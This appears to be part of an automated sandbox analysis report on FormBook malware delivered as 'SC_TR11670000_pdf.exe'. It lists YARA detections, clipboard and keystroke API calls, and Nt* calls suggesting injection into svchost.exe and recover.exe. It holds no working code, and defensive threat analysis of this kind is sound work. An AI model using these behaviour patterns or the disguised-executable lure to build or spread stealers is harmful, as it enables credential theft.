                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B5425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B5425A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B54458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B54458
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B5425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B5425A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B40219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00B40219
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B6CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B6CDAC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00AE3B4C
                Source: SC_TR11670000_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SC_TR11670000_pdf.exe, 00000000.00000000.1736858249.0000000000B95000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1e40a128-c
                Source: SC_TR11670000_pdf.exe, 00000000.00000000.1736858249.0000000000B95000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_25d3eb9b-f
                Source: SC_TR11670000_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c9da2173-a
                Source: SC_TR11670000_pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bccc72d2-5
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: SC_TR11670000_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C8F3 NtClose,1_2_0042C8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03944340 NtSetContextThread,LdrInitializeThunk,3_2_03944340
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03944650 NtSuspendThread,LdrInitializeThunk,3_2_03944650
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03942BA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03942BF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03942BE0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942B60 NtClose,LdrInitializeThunk,3_2_03942B60
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942AD0 NtReadFile,LdrInitializeThunk,3_2_03942AD0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942AF0 NtWriteFile,LdrInitializeThunk,3_2_03942AF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942FB0 NtResumeThread,LdrInitializeThunk,3_2_03942FB0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942FE0 NtCreateFile,LdrInitializeThunk,3_2_03942FE0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942F30 NtCreateSection,LdrInitializeThunk,3_2_03942F30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03942E80
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03942EE0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942DD0 NtDelayExecution,LdrInitializeThunk,3_2_03942DD0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03942DF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03942D10
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03942D30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03942CA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03942C70
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942C60 NtCreateKey,LdrInitializeThunk,3_2_03942C60
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039435C0 NtCreateMutant,LdrInitializeThunk,3_2_039435C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039439B0 NtGetContextThread,LdrInitializeThunk,3_2_039439B0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942B80 NtQueryInformationFile,3_2_03942B80
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942AB0 NtWaitForSingleObject,3_2_03942AB0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942F90 NtProtectVirtualMemory,3_2_03942F90
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942FA0 NtQuerySection,3_2_03942FA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942F60 NtCreateProcessEx,3_2_03942F60
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942EA0 NtAdjustPrivilegesToken,3_2_03942EA0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942E30 NtWriteVirtualMemory,3_2_03942E30
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942DB0 NtEnumerateKey,3_2_03942DB0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942D00 NtSetInformationFile,3_2_03942D00
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942CC0 NtQueryVirtualMemory,3_2_03942CC0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942CF0 NtOpenProcess,3_2_03942CF0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03942C00 NtQueryInformationProcess,3_2_03942C00
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943090 NtSetValueKey,3_2_03943090
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943010 NtOpenDirectoryObject,3_2_03943010
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943D10 NtOpenProcessToken,3_2_03943D10
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_03943D70 NtOpenThread,3_2_03943D70
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F99240 NtReadFile,3_2_02F99240
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F993D0 NtClose,3_2_02F993D0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F99330 NtDeleteFile,3_2_02F99330
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F990D0 NtCreateFile,3_2_02F990D0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F99540 NtAllocateVirtualMemory,3_2_02F99540
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_037DF975 NtClose,3_2_037DF975
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B440B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00B440B1
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B38858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B38858
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B4545F
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AEE8000_2_00AEE800
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0DBB50_2_00B0DBB5
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AEE0600_2_00AEE060
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B6804A0_2_00B6804A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF41400_2_00AF4140
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B024050_2_00B02405
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B165220_2_00B16522
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B1267E0_2_00B1267E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B606650_2_00B60665
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0283A0_2_00B0283A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF68430_2_00AF6843
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B189DF0_2_00B189DF
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B16A940_2_00B16A94
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B60AE20_2_00B60AE2
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF8A0E0_2_00AF8A0E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B48B130_2_00B48B13
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B3EB070_2_00B3EB07
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0CD610_2_00B0CD61
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B170060_2_00B17006
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF31900_2_00AF3190
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF710E0_2_00AF710E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE12870_2_00AE1287
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B033C70_2_00B033C7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0F4190_2_00B0F419
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF56800_2_00AF5680
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B016C40_2_00B016C4
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B078D30_2_00B078D3
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AF58C00_2_00AF58C0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B01BB80_2_00B01BB8
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B19D050_2_00B19D05
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AEFE400_2_00AEFE40
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0BFE60_2_00B0BFE6
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B01FD00_2_00B01FD0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_01C535D00_2_01C535D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004188A31_2_004188A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028401_2_00402840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030591_2_00403059
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028311_2_00402831
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028381_2_00402838
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041016A1_2_0041016A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416ADE1_2_00416ADE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AE31_2_00416AE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032951_2_00403295
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032A01_2_004032A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023841_2_00402384
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023901_2_00402390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103931_2_00410393
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4131_2_0040E413
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024191_2_00402419
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D951_2_00402D95
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402DA01_2_00402DA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EFA31_2_0042EFA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E2F301_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DCD1F1_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036856301_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037095C31_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
